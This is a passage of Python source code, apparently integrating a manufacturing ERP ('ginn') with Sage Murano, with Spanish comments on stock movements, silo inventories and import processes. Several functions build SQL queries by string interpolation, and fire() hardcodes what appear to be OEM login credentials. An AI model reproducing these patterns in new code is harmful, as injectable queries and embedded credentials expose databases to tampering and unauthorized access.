Murano. Solo simula la operación con\n éxito.\n Devuelve True si **todos** los artículos se volcaron.\n Funciona **COMO UN GENERADOR** para poder ser usado en parte_produccion_*\n con barras de progreso. Devuelve en cada paso el artículo insertado en la\n tabla temporal listo para procesar. En el último paso devuelve el\n `guid_proceso` o algo interpretable como booleano, que será False si\n *alguno* de los artículos no se pudo importar. El penúltimo es el\n guid_proceso **antes** de ejecutarse el `fire`, para poder notificar al\n usuario.\n \"\"\"\n i = 0\n # OJO: cantidad=-1 no está probado.\n assert abs(cantidad) == 1, \"Cantidad debe ser -1 o 1.\"\n # Cantidad fija para todos. Esto es solo para dar de alta\n # productos con trazabilidad más rápidamente.\n guid_proceso = None # El primer GUID es nulo. Hay que crearlo con el\n # primero de los artículos a volcar.\n observaciones = \"\" # Para que los comentarios del registro de Murano sean\n # automáticos y se fuerce la serie 'FAB'.\n procesar = True # Se puede llegar a usar, como con los palés, para\n # encadenar varias importaciones en un mismo proceso de importación. De\n # momento no se permite y se procesa la importación completa.\n totarticulos = len(articulos)\n if VERBOSE:\n # pylint: disable=import-error\n from lib.tqdm.tqdm import tqdm # Barra de progreso modo texto.\n articulos = tqdm(articulos, total=totarticulos, leave=False)\n for articulo in articulos:\n i += 1\n producto = articulo.productoVenta\n if VERBOSE:\n articulos.set_description(\"Creando articulo %s... (%d/%d)\" % (\n articulo.codigo, i, totarticulos))\n # El primer articulo instanaciará el IdProcesoIME y se lo iré pasando\n # a los demás articulos. No lanzo el fire de ninguna de ellas. Lo haré\n # cuando tenga la estructura completa en la tmpIME montada.\n guid_proceso = create_articulo(articulo,\n cantidad=cantidad,\n producto=producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=False,\n codigo_almacen=None, # Auto\n calidad=None, # Auto\n observaciones=observaciones,\n serie=serie,\n fecha=fecha)\n yield articulo\n yield guid_proceso\n if procesar:\n if guid_proceso: # Si todos ya existían, guid_proceso es None.\n res = fire(guid_proceso)\n else: # Nada que insertar. Nada insertado. Resultado, False.\n res = False\n else:\n res = guid_proceso\n # Hasta que no finaliza no puedo comprobar si ha habido errores. Compruebo\n # los que se han volcado, les pongo el campo `.api` a True y devuelvo en\n # consecuencia.\n for articulo in articulos:\n articulo.api = existe_articulo(articulo)\n articulo.syncUpdate()\n # res = reduce(lambda i, l: i and l, articulos)\n todos_volcados = len([i for i in articulos if bool(i)]) == len(articulos)\n res = len(articulos) and todos_volcados and res\n yield res\n\n\ndef create_articulo(articulo, cantidad=1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, codigo_almacen=None,\n calidad=None, observaciones=None, serie=\"API\", fecha=None):\n \"\"\"\n Crea un artículo nuevo en Murano con el producto recibido. Si no se\n recibe ninguno, se usa el que tenga asociado en ginn. Si se recibe un\n objeto producto, se ignora el actual del artículo, se reemplaza en ginn\n por el recibido y se da de alta así en Murano.\n Devuelve False si hubo errores y no se creó o True (o el GUID de proceso)\n en otro caso.\n Las observaciones van como «comentario» en los registros de mov. de Murano.\n Si las observaciones son \"\", se usa el comentario por defecto del\n create_bala, *_rollo, etc. Pero se fuerza al usuario (más bien al código\n de partes_de_fabricacion_*) a que especifiquen la cadena vacía.\n Si se `observaciones` es \"\" se usa la serie 'FAB' independientemente de\n lo que se haya indicado en `serie`.\n \"\"\"\n assert observaciones is not None, \"murano.ops.create_articulo::\"\\\n \"Debe indicar el motivo en el parámetro «observaciones».\"\n # TODO: ¿Y al descontar existencias? ¿Comprobar también que existan antes?\n # De todos modos el proceso de importación devolverá error si la serie\n # está duplicada.\n if cantidad < 0:\n delta = -1\n else:\n delta = 1\n assert articulo is not None, \"Debe especificarse un artículo.\"\n res = False\n if delta < 0 or not duplica_articulo(articulo, producto):\n for i in range(abs(cantidad)): # pylint: disable=unused-variable\n if articulo.es_bala():\n res = create_bala(articulo.bala, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n elif articulo.es_balaCable():\n res = create_bala(articulo.balaCable, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n elif articulo.es_bigbag():\n res = create_bigbag(articulo.bigbag, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n elif articulo.es_caja():\n res = create_caja(articulo.caja, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n elif articulo.es_rollo():\n res = create_rollo(articulo.rollo, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n elif articulo.es_rollo_defectuoso():\n res = create_rollo(articulo.rolloDefectuoso, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n elif articulo.es_rolloC():\n res = create_rollo(articulo.rolloC, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n else:\n raise ValueError(\"El artículo %s no es bala, bala de cable, \"\n \"bigbag, caja, rollo ni rollo C.\"\n % (articulo.puid))\n if VERBOSE:\n print(\"ops::create_articulo --> {}.res = {} ({})\".format(\n articulo.puid, res, type(res)))\n articulo.api = bool(res)\n articulo.syncUpdate()\n else:\n logging.warning(\"El código %s ya existe en Murano. Se ignora.\",\n articulo.codigo)\n return res\n\n\ndef update_producto(articulo, producto, observaciones=None, serie=\"API\",\n fecha=None):\n \"\"\"\n Cambia el artículo recibido al producto indicado.\n \"\"\"\n res = delete_articulo(articulo, observaciones=observaciones, serie=serie)\n if res:\n res = create_articulo(articulo, producto=producto,\n observaciones=observaciones,\n serie=serie, fecha=fecha)\n return res\n\n\ndef update_stock(producto, delta, almacen, guid_proceso=None,\n simulate=False, procesar=True):\n \"\"\"\n Incrementa o decrementa el stock del producto en la cantidad recibida en\n en el parámetro «delta».\n El producto **no** debe tener trazabilidad. En otro caso deben usarse las\n funciones \"crear_[bala|rollo...]\".\n \"\"\"\n assert isinstance(producto, pclases.ProductoCompra)\n partida = \"\"\n unidad_medida = \"\" # producto.unidad\n comentario = (\"Stock [ginn] %f (%s)\" % (delta, producto.get_info()))[:40]\n serie = 'FAB'\n ubicacion = \"Almacén general\"[:15]\n numero_serie_lc = \"\"\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n database = c.get_database()\n today = datetime.datetime.today()\n ejercicio = today.year\n periodo = today.month\n fecha = today.strftime(\"%Y-%m-%d %H:%M:%S\")\n documento = int(today.strftime(\"%Y%m%d\"))\n codigo_articulo = buscar_codigo_producto(producto)\n if isinstance(almacen, pclases.Almacen):\n codigo_almacen = buscar_codigo_almacen(almacen)\n else:\n codigo_almacen = almacen # He recibido un código directamente.\n codigo_talla = \"\" # No hay calidades en los productos de compra.\n grupo_talla = 0 # No tratamiento de calidad en productos sin trazabilidad.\n if delta >= 0:\n tipo_movimiento = 1 # 1 = entrada, 2 = salida.\n else:\n delta = abs(delta)\n tipo_movimiento = 2\n unidades = delta # En dimensión base del producto.\n # precio = producto.precioDefecto\n precio = buscar_precio_coste(producto, ejercicio, codigo_almacen)\n importe = unidades * precio\n factor_conversion = buscar_factor_conversion(producto)\n unidades2 = unidades * factor_conversion\n origen_movimiento = \"F\" # E = Entrada de Stock (entrada directa),\n # F (fabricación), I (inventario),\n # M (rechazo fabricación), S (Salida stock)\n # P (apertura), B(albarán de compra), A(albarán de venta)\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n # En el movimiento de stock la unidad principal (unidad_medida) es la que\n # sea. En la segunda unidad (unidad_mediad2) mandamos \"\", que es lo que\n # me devolverá buscar_unidad_medida_basica para todo lo que no sea un\n # producto con código de trazabilidad.\n unidad_medida2 = buscar_unidad_medida_basica(producto)\n guid_movposicion = generar_guid(c)\n canal_div = ''\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento, numero_serie_lc,\n id_proceso_IME, guid_movposicion)\n if simulate:\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME, acumular_campos_personalizados=False)\n else: # No proceso la importación. Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\ndef delete_articulo(articulo, codigo_almacen=None, observaciones=None,\n serie='API', fecha=None, guid_proceso=None,\n simulate=False, procesar=True):\n \"\"\"\n Elimina el artículo en Murano mediante la creación de un movimiento de\n stock negativo de ese código de producto.\n \"\"\"\n # Buscamos el producto que tiene asignado ahora en Murano para darlo de\n # baja de ESE producto en concreto. Seguramente no sea el que tiene\n # asignado en ginn y fallará si intentamos crear el movimiento negativo\n # contra él.\n res = False\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n movserie = get_ultimo_movimiento_articulo_serie(conn, articulo)\n if movserie:\n id_producto_anterior = movserie[\"CodigoArticulo\"]\n producto_anterior = get_producto_ginn(id_producto_anterior)\n res = create_articulo(articulo, cantidad=-1,\n producto=producto_anterior,\n codigo_almacen=codigo_almacen,\n observaciones=observaciones,\n serie=serie, fecha=fecha,\n guid_proceso=guid_proceso,\n procesar=procesar,\n simulate=simulate)\n else:\n logging.warning(\"El artículo %s no existe en Murano.\", articulo.codigo)\n return res\n\n\ndef consumir(productoCompra, cantidad, almacen=None, consumo=None):\n \"\"\"\n Decrementa las existencias del producto recibido en la cantidad indicada\n mediante registros de movimientos de stock en Murano en el almacén\n principal si no se indica otro como tercer parámetro; o en el almacén del\n silo correspondiente si almacen es None, el producto de compra es de\n granza y se especifica un consumo.\n \"\"\"\n if not almacen:\n if not productoCompra.es_granza():\n almacen = pclases.Almacen.get_almacen_principal()\n # Los consumos de materia prima siempre se hacen desde el almacén\n # principal. EXCEPTO los de granza, que se hacen desde un silo que\n # se trata como almacén en Murano.\n else:\n try:\n almacen = consumo.silo\n except AttributeError:\n raise ValueError(\"Si no especifica un almacén debe indicar \"\n \"el consumo origen de ginn como referencia.\")\n res = update_stock(productoCompra, -cantidad, almacen)\n if consumo: # Si he recibido el consumo, actualizo el valor `api`.\n consumo.api = res\n consumo.sync()\n return res\n\n\ndef get_existencias_silo(silo):\n \"\"\"\n Recibe un silo de ginn y devuelve un diccionario con los productos y sus\n existencias en el almacén correspondiente de Murano.\n Cada silo tiene un almacén en Murano.\n 0. Se determina el almacén correspondiente en Murano al silo recibido.\n 1. Se buscan los productos que hay en ese almacén y sus existencias.\n 2. Se monta un diccionario con los productos de ginn correspondientes a\n los productos de Murano de ese almacén.\n 3. Se almacena en el diccionario, para cada producto de ginn, las\n existencias consultadas anteriormente.\n 4. Se devuelve ese diccionario.\n \"\"\"\n res = {}\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n rs_ejercicio = conn.run_sql(\"\"\"SELECT MAX(Ejercicio) AS ejercicio\n FROM {}.dbo.AcumuladoStock\n WHERE CodigoEmpresa = {};\n \"\"\".format(conn.get_database(),\n CODEMPRESA))\n try:\n ejercicio = rs_ejercicio[0]['ejercicio']\n except (IndexError, KeyError):\n ejercicio = datetime.date.today().year\n almacen = buscar_almacen_silo(silo)\n sql_silos = \"\"\"SELECT AcumuladoStock.Ejercicio,\n AcumuladoStock.CodigoEmpresa,\n AcumuladoStock.CodigoAlmacen,\n Articulos.CodigoFamilia,\n Articulos.CodigoSubfamilia,\n Familias.Descripcion,\n Subfamilias.Descripcion AS Descripcion2,\n AcumuladoStock.CodigoArticulo,\n Articulos.DescripcionArticulo,\n AcumuladoStock.CodigoTalla01_,\n AcumuladoStock.Partida,\n ArticulosSeries.NumeroSerieLc,\n Articulos.UnidadMedida2_,\n Articulos.UnidadMedidaAlternativa_,\n AcumuladoStock.UnidadSaldo,\n AcumuladoStock.UnidadSaldoTipo_,\n Articulos.TipoEnvase_,\n Articulos.PrecioCompra,\n ArticulosSeries.GEO_CosteUnidadEspecifica,\n ArticulosSeries.UnidadesSerie,\n ArticulosSeries.PesoBruto_,\n ArticulosSeries.PesoNeto_,\n ArticulosSeries.MetrosCuadrados\n FROM AcumuladoStock\n INNER JOIN Articulos ON AcumuladoStock.CodigoEmpresa =\n Articulos.CodigoEmpresa\n AND AcumuladoStock.CodigoArticulo = Articulos.CodigoArticulo\n LEFT OUTER JOIN ArticulosSeries ON\n AcumuladoStock.Partida = ArticulosSeries.Partida AND\n AcumuladoStock.CodigoAlmacen = ArticulosSeries.CodigoAlmacen\n AND\n AcumuladoStock.CodigoTalla01_ = ArticulosSeries.CodigoTalla01_\n AND Articulos.CodigoEmpresa =\n ArticulosSeries.CodigoEmpresa AND\n Articulos.CodigoArticulo = ArticulosSeries.CodigoArticulo\n LEFT OUTER JOIN Familias AS Subfamilias ON\n Articulos.CodigoFamilia = Subfamilias.CodigoFamilia AND\n Articulos.CodigoSubfamilia = Subfamilias.CodigoSubfamilia AND\n Articulos.CodigoEmpresa = Subfamilias.CodigoEmpresa\n LEFT OUTER JOIN Familias ON\n Articulos.CodigoFamilia = Familias.CodigoFamilia AND\n Articulos.CodigoEmpresa = Familias.CodigoEmpresa AND\n Familias.CodigoSubfamilia = '**********'\n WHERE AcumuladoStock.Periodo = 99\n AND AcumuladoStock.Ejercicio = %d\n AND AcumuladoStock.CodigoAlmacen = '%s'\n AND AcumuladoStock.CodigoEmpresa = '%s'\n AND AcumuladoStock.UnidadSaldo <> 0\n ORDER BY FechaUltimaEntrada DESC;\"\"\" % (\n ejercicio, almacen, CODEMPRESA)\n res_murano = conn.run_sql(sql_silos)\n for registro in res_murano:\n codigo_producto = registro['CodigoArticulo']\n existencias = registro['UnidadSaldo']\n producto = get_producto_ginn(codigo_producto)\n res[producto] = float(existencias)\n return res\n\n\ndef get_ocupado_silo(silo):\n \"\"\"\n Devuelve la cantidad total de existencias que hay en un silo, sea del\n producto que sea.\n \"\"\"\n stock_murano = get_existencias_silo(silo)\n ocupado = sum([stock_murano[producto] for producto in stock_murano])\n return ocupado\n\n\ndef get_carga_mas_antigua_silo(silo):\n \"\"\"\n Devuelve una estructura similar a las cargas de ginn pero con los datos\n de Murano. Ver pclases.Silo.get_carga_mas_antigua\n \"\"\"\n CargaSilo = namedtuple('CargaSilo',\n ['productoCompra', 'siloID', 'cantidad'])\n productos_cargados = get_existencias_silo(silo)\n cs = None\n for pc in productos_cargados:\n # Solo devolverá uno: el último. Las cargas están ordenadas por fecha\n # de carga de la más nueva a la más antigua.\n cs = CargaSilo(pc, silo.id, productos_cargados[pc])\n return cs\n\n\ndef get_producto_ginn(codigo_murano):\n \"\"\"\n Devuelve el objeto producto de ginn (de compra o de venta) según el código\n recibido de Murano.\n \"\"\"\n # FIXME: Implementar otra forma de que la relación sea biyectiva.\n # OJO: HARCODED. Si se crean nuevos productos, hay que tener cuidado de que\n # se respete esta codificación.\n if codigo_murano.startswith(\"PC\"):\n clase = pclases.ProductoCompra\n elif codigo_murano.startswith(\"PV\"):\n clase = pclases.ProductoVenta\n else:\n raise NotImplementedError(\"Solo se permite buscar por código PV|PC\")\n idginn = int(codigo_murano.replace(\"PC\", \"\").replace(\"PV\", \"\"))\n res = clase.get(idginn)\n return res\n\n\ndef buscar_almacen_silo(silo):\n \"\"\"\n Devuelve el código de almacén de Murano del silo recibido.\n \"\"\"\n # OJO: HARCODED\n # Podría tirar de la tabla almacenes y buscar por nombre, pero prefiero\n # ahorrar llamadas al SQLServer.\n almacenes = {\"Silo 1\": \"SIL1\",\n \"Silo 2\": \"SIL2\",\n \"Silo 3\": \"SIL3\",\n \"Silo 4\": \"SIL4\",\n \"Silo 5\": \"SIL5\",\n \"Silo 6\": \"SIL6\",\n \"Silo 7\": \"SIL7\",\n \"Silo 8\": \"SIL8\"}\n try:\n almacen = almacenes[silo.nombre]\n except KeyError:\n almacen = None\n return almacen\n\n\ndef _str_time(t):\n \"\"\"\n Devuelve una cadena con los segundos recibidos en formato minutos:segundos\n \"\"\"\n minutos = int(t // 60)\n segundos = t % 60\n if minutos:\n res = \"{:d}:{:0>5.2f} m\".format(minutos, segundos)\n else:\n res = \"{:.2f} s\".format(segundos)\n return res\n\n\ndef _get_fin_proceso_importacion_retcode(guid):\n \"\"\"\n Busca un registro concreto en la tabla de Murano encargada de procesar\n las importaciones. Si ese registro existe, la importación ha finalizado.\n Si en ese registro el valor del campo sysStatus es 0, el proceso ha\n terminado bien. Si es 2 (u otro valor, en general) ha habido algún error.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n sql = \"\"\"SELECT sysStatus\n FROM {}.dbo.lsysTraceIME\n WHERE IdProcesoIME=CONVERT(uniqueidentifier, '{}')\n AND sysTraceDescription LIKE 'Fin proceso de importaci%n';\"\"\".format(\n conn.get_database(), guid)\n try:\n # FIXME: Ojo porque puede crear 2 registros con el mismo texto y guid.\n # ¿Mismo sysStatus también? Espero que sí... Preguntar a Sage.\n res = conn.run_sql(sql)[0]['sysStatus']\n except IndexError:\n res = None\n return res\n\n\ndef _get_fin_proceso_acumulacion_retcode(guid):\n \"\"\"\n Busca un registro concreto en la tabla de Murano encargado de acumular los\n campos personalizados en las importaciones.\n Si ese registro existe, la importación ha finalizado.\n Si en ese registro el valor del campo sysStatus es 0, el proceso ha\n acumulado bien. Si es 2 (u otro valor, en general) ha habido algún error.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n sql = \"\"\"SELECT sysStatus\n FROM {}.dbo.LsysTraceIME\n WHERE IdProcesoIME=CONVERT(uniqueidentifier, '{}')\n AND sysTraceDescription LIKE 'Fin proceso de acumulaci%n';\"\"\".format(\n conn.get_database(), guid)\n try:\n res = conn.run_sql(sql)[0]['sysStatus']\n except IndexError:\n res = None\n return res\n\n\ndef espera_activa(funcion, parametros, res=None, timeout=30, tick=5):\n \"\"\"\n Ejecuta la función recibida aplicando la **lista** de parámetros en\n intervalos de `tick`segundos hasta llegar al tiempo indicado en `timeout`\n o hasta que el valor devuelto por la función sea diferente al recibido\n en `res`.\n Devuelve lo que devuelva la función `funcion`.\n \"\"\"\n antes = time.time()\n if VERBOSE:\n logging.warning(\"Iniciando espera activa...\")\n tries = 0\n max_tries = timeout/tick\n while timeout > 0:\n retCode = funcion(*parametros)\n tries += 1\n if retCode != res:\n success = True\n res = retCode\n timeout = 0\n else:\n success = False\n time.sleep(tick)\n timeout -= tick\n tiempo = time.time() - antes\n strlog = \"[{}] Espera activa finalizada en {}/{} intentos ({:.2f} s)\"\\\n \".\".format(success and '✔' or '✘', tries, max_tries, tiempo)\n if VERBOSE:\n logging.warning(strlog)\n return res\n\n\n# pylint: disable=too-many-statements\ndef fire(guid_proceso, ignore_errors=False,\n acumular_campos_personalizados=True):\n \"\"\"\n Lanza el proceso de importación de Murano de todos los movimientos de\n stock de la tabla temporal.\n\n ~~Devuelve 0 si el proceso se completó con éxito o 1 en caso contrario.~~\n\n Devuelve True si se completó con éxito o False en caso contrario.\n Ya no devuelve None si Murano lanzó asíncronamente los procesos de\n importación y acumulación. Ahora se hace espera activa hasta que acabe\n el proceso o el tiempo máximo de espera (único caso en que devolvería\n None).\n \"\"\"\n antes = time.time()\n strerror = \"No puede ejecutar código nativo de Murano. Necesita instalar\"\\\n \" la biblioteca win32com y lanzar esta función desde una \"\\\n \"plataforma donde se encuentre instalado Sage Murano.\"\n if not LCOEM:\n raise NotImplementedError(strerror)\n if VERBOSE:\n logging.info(\"Inicializando OEM...\")\n burano = win32com.client.Dispatch(\"LogicControlOEM.OEM_EjecutaOEM\")\n burano.InicializaOEM(CODEMPRESA,\n \"OEM\",\n \"oem\",\n \"\",\n r\"LOGONSERVER\\MURANO\",\n \"GEOTEXAN\")\n ahora = time.time()\n tiempo_inicializacion = ahora - antes\n str_tiempo_inicializacion = _str_time(tiempo_inicializacion)\n if VERBOSE:\n logging.info(\"OEM inicializada en %s\", str_tiempo_inicializacion)\n retCode = None\n operacion = \"ImportaIME\"\n strverbose = \"Lanzando proceso de importación `%s` con GUID `%s`...\" % (\n operacion, guid_proceso)\n if VERBOSE:\n logging.info(strverbose)\n if VERBOSE and DEBUG:\n print(strverbose)\n retCode = burano.EjecutaOEM(\"LCCImExP.LcImExProceso\", operacion,\n str(guid_proceso), 1, 1, 4)\n # 1 = No borrar registros IME al finalizar.\n # 1 = No borrar registros con errores ni siquiera cuando el primer\n # parámetro esté a 0.\n # 0 = Ejecutar en todos los módulos.\n # 4 = Procesar solo para el módulo de gestión. [20160704] Cambiamos 0 por 4\n # ### [20170601] Espera activa.\n # DONE: En lugar de usar el código de retorno, como resulta que al final\n # las llamadas a la dll son asíncronas, haremos un SELECT contra\n # LsysTraceIME buscando el GUID en cuestión y en sysTraceDescription el\n # texto 'Fin proceso de importación\".\n # Si sysStatus es 0, ha acabado bien. Si es 2 (u otro valor), ha habido\n # fallos.\n # **Si el registro no existe, es que no ha terminado todavía.** Hacer\n # espera activa hasta que aparezca el registro.\n retCode = None # XXX: [20170601] Por algún motivo que ni Félix ni yo\n # adivinamos, la lcOEM ha empezado a devolver 1 aunque importe\n # correctamente los registros. Por tanto, el valor de retorno ya no es\n # útil para detectar nada. Usaremos ya siempre la espera activa, que es lo\n # único fiable.\n if retCode is None:\n retCode = espera_activa(_get_fin_proceso_importacion_retcode,\n [guid_proceso], retCode, timeout=40, tick=5)\n # ### EOEspera_activa\n strverbose = \"Importación `%s` concluida con código de retorno: %s\" % (\n guid_proceso, retCode)\n if VERBOSE:\n logging.info(strverbose)\n if VERBOSE and DEBUG:\n print(strverbose)\n # Si retcode es 1: cagada. Si es 0: éxito\n # ¿Y si es None? Lo he visto en procesos con errores.\n # Mucho me temo que si es None, no lo ha procesado. Y no se procesan más\n # adelante. Se quedan pendiente para siempre.\n # **A no ser que se procese a mano desde Murano**. Entonces se desbloquean\n # todos los pendientes y deja entrar más.\n # **Pero si se hace a mano no se ejecutan el AcumularCamposSeries y el\n # GEO_DIV que divide entre 100.**\n # El GEO_DIV se ejecutará en la siguiente importación, porque se hace\n # para todos los pendientes. Pero el otro necesita un GUID de proceso\n # y habría que editarlo y ejecutarlo a mano uno por uno de los pendientes.\n # O bien tirar del Sr. Lobo y que haga el fire de todos los pendientes.\n # [2016/08/30] UPDATE: En la versión 2016.70.000 se corrige el bug de\n # Murano. Ya no es necesario usar el canal DIV.\n if retCode is None: # Solo ocurre si se alcanza timeout en espera_activa\n if VERBOSE:\n logging.warning(\"Se cambia el valor None por 1 (FAIL).\")\n retCode = 1\n if retCode and not ignore_errors:\n strerr = \"¡PROCESO DE IMPORTACIÓN %s CON ERRORES!\"\\\n \" No se lanza el script de acumulación de stock.\" % (\n guid_proceso)\n logging.error(strerr)\n else:\n if retCode:\n strerr = \"¡PROCESO DE IMPORTACIÓN %s CON ERRORES!\" % (guid_proceso)\n logging.error(strerr)\n # Después de cada proceso hay que invocar al cálculo que acumula los\n # campos personalizados:\n # FIXED: No ejecuta el cálculo. Era por las '' alrededor del guid.\n # Según el .chm de ayuda los parámetros van sin encerrar en nada\n # aunque sean cadena.\n nombrescript = \"AcumularCamposNuevosSeries\"\n paramsscript = \"Label:=Inicio, idProcesoIME:=%s\" % guid_proceso\n if not acumular_campos_personalizados:\n # Si la importación es de movimiento de productos sin campos\n # personalizados, no tiene sentido perder 30 segundos en intentar\n # acumular nada.\n strverbose = \"Se ignora script `%s` con GUID `%s`...\" % (\n nombrescript, guid_proceso)\n if VERBOSE:\n logging.info(strverbose)\n if VERBOSE and DEBUG:\n print(strverbose)\n else:\n strverbose = \"Lanzando script `%s` con GUID `%s`...\" % (\n nombrescript, guid_proceso)\n if VERBOSE:\n logging.info(strverbose)\n if VERBOSE and DEBUG:\n print(strverbose)\n retCode = burano.EjecutaScript(nombrescript, paramsscript)\n # retCode devuelve (True, ...) si se hace con éxito. El problema es\n # que no sé si retCode[0] será False cuando falla.\n # ### Fuerzo espera activa para obtener el resultado **real**\n # (la llamada dentro de la dll parece ser asíncrona y el valor de\n # retorno, si lo hay, no es de fiar. Puede que siempre sea True\n # pase lo que pase por dentro de Murano)\n retCode = None\n if retCode is None:\n retCode = espera_activa(_get_fin_proceso_acumulacion_retcode,\n [guid_proceso], retCode, timeout=20,\n tick=5)\n strverbose = \"Ejecución `%s` (GUID `%s`) \"\\\n \"concluida con código de retorno: %s\" % (\n nombrescript, guid_proceso, retCode)\n if VERBOSE:\n logging.info(strverbose)\n if VERBOSE and DEBUG:\n print(strverbose)\n # ## Ya no es necesario el script del canal DIV. Sage solucionó el bug.\n # nombrescript = \"GEO_DividirStock\"\n # paramsscript = \"Label:=Inicio\"\n # strverbose = \"Lanzando script `%s`...\" % (\n # nombrescript)\n # logging.info(strverbose)\n # if VERBOSE and DEBUG:\n # print(strverbose)\n # retCode = burano.EjecutaScript(nombrescript, paramsscript)\n # strverbose = \"Ejecución `%s` concluida con código de retorno: %s\" % (\n # nombrescript, retCode)\n # logging.info(strverbose)\n # if VERBOSE and DEBUG:\n # print(strverbose)\n # El código de retorno es 1 ó 2 para error y 0 para éxito o bien una tupla\n # con True/False en la primera posición. Cambio a boolean.\n if VERBOSE:\n strres = \"murano:ops:fire -> Código de retorno: {} ({})\".format(\n retCode, type(retCode))\n print(strres)\n logging.info(strres)\n if isinstance(retCode, int):\n res = not bool(retCode)\n else:\n try:\n res = retCode[0]\n except IndexError: # ¿Qué demonios es?\n res = bool(retCode)\n except TypeError: # Es None. Lo interpretará como False la invocadora\n res = None\n if VERBOSE:\n strres = \"murano:ops:fire -> Valor devuelto: {} ({})\".format(\n res, type(res))\n try:\n print(strres)\n logging.info(strres)\n except IOError:\n # Por un error extraño en el ordenador de cemento, que lanza\n # un IOError Errno 9 Bad file descriptor. Probablemente por no\n # tener salida estándar (se abre sin ventana de \"terminal\").\n pass\n ahora = time.time()\n tiempo_fire = ahora - antes\n str_tiempo_fire = _str_time(tiempo_fire)\n if VERBOSE:\n logging.info(\"Proceso de importación `%s` finalizado en %s\",\n guid_proceso, str_tiempo_fire)\n return res\n\n\ndef corregir_dimensiones_articulo(articulo, peso_bruto=None, peso_neto=None,\n metros_cuadrados=None):\n \"\"\"\n Corrige el peso bruto, neto y metros cuadrados del artículo recibido\n para poner en Murano los indicados por parámetro o los de los valores\n en ginn para el artículo si son None.\n \"\"\"\n if peso_bruto is None:\n peso_bruto = articulo.peso_bruto\n if peso_neto is None:\n peso_neto = articulo.peso_neto\n if metros_cuadrados is None:\n metros_cuadrados = articulo.superficie\n if metros_cuadrados is None:\n metros_cuadrados = 0\n codigo = articulo.codigo\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n tablas = ['ArticulosSeries', 'MovimientoArticuloSerie',\n 'GEO_LineasSeriesCargadas', 'GEO_Pales']\n res = True\n for tabla in tablas:\n SQL = r\"\"\"UPDATE %s.dbo.%s\n SET PesoBruto_ = %f,\n PesoNeto_ = %f,\n MetrosCuadrados = %f\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = '%s';\n \"\"\" % (conn.get_database(), tabla, peso_bruto, peso_neto,\n metros_cuadrados, codigo, CODEMPRESA)\n res = conn.run_sql(SQL) and res\n return res\n\n\ndef _get_peso_bruto_murano(articulo):\n \"\"\"\n Devuelve el peso bruto que guarda Murano para el artículo de ginn recibido.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT PesoBruto_ FROM %s.dbo.ArticulosSeries\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = %d;\"\"\" % (conn.get_database(),\n articulo.codigo,\n CODEMPRESA)\n try:\n res = conn.run_sql(SQL)[0]['PesoBruto_']\n except IndexError:\n res = None\n else:\n res = float(res) # Viene como Decimal()\n return res\n\n\ndef _get_peso_neto_murano(articulo):\n \"\"\"\n Devuelve el peso bruto que guarda Murano para el artículo de ginn recibido.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT PesoNeto_ FROM %s.dbo.ArticulosSeries\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = %d;\"\"\" % (conn.get_database(),\n articulo.codigo,\n CODEMPRESA)\n try:\n res = conn.run_sql(SQL)[0]['PesoNeto_']\n except IndexError:\n res = None\n else:\n res = float(res)\n return res\n\n\ndef _get_superficie_murano(articulo):\n \"\"\"\n Devuelve el peso bruto que guarda Murano para el artículo de ginn recibido.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT MetrosCuadrados FROM %s.dbo.ArticulosSeries\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = %d;\"\"\" % (conn.get_database(),\n articulo.codigo,\n CODEMPRESA)\n try:\n res = conn.run_sql(SQL)[0]['MetrosCuadrados']\n except IndexError:\n res = None\n else:\n res = float(res)\n return res\n\n\ndef 